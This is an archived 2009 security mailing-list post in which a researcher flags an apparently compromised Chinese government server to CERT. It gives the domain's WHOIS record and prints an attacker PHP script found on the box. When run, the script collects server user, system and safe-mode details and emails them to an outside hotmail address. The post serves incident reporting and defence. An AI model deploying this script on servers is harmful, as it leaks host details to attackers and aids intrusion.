[nsp-sec] CN CERT to the WCP please

Fri Aug 14 14:40:30 EDT 2009

popped .gov.cn box? please send to the approprate people. looks like  
a box at jssalt.gov.cn is being used as a mailer for attackers.

Domain Name: jssalt.gov.cn
ROID: 20061018s10061s00768421-cn
Domain Status: clientTransferProhibited
Registrant Organization: æ±Ÿè‹çœç›åŠ¡ç®¡ç†å±€
Registrant Name: æ±Ÿè‹çœç›åŠ¡ç®¡ç†å±€
Administrative Email: wqq at 71nc.com
Sponsoring Registrar: åŽ¦é—¨ä¸‰äº”äº’è”ç§‘æŠ€è‚¡ä»½æœ‰é™å
¬å¸
Name Server:ns3.dns-diy.com
Name Server:ns4.dns-diy.com
Registration Date: 2006-10-18 16:19
Expiration Date: 2016-10-18 16:19

URL: http://jssalt.gov.cn/box.txt

<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
  if ($SafeMode == '') { $SafeMode = "OFF"; }
  else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "total.tecnologia at hotmail.com";
$assunto = "lup@";
$email1 = "total.tecnologia at hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>

_____________________________
jose nazario, ph.d. jose at arbor.net
manager of security research, arbor networks
http://asert.arbor.net/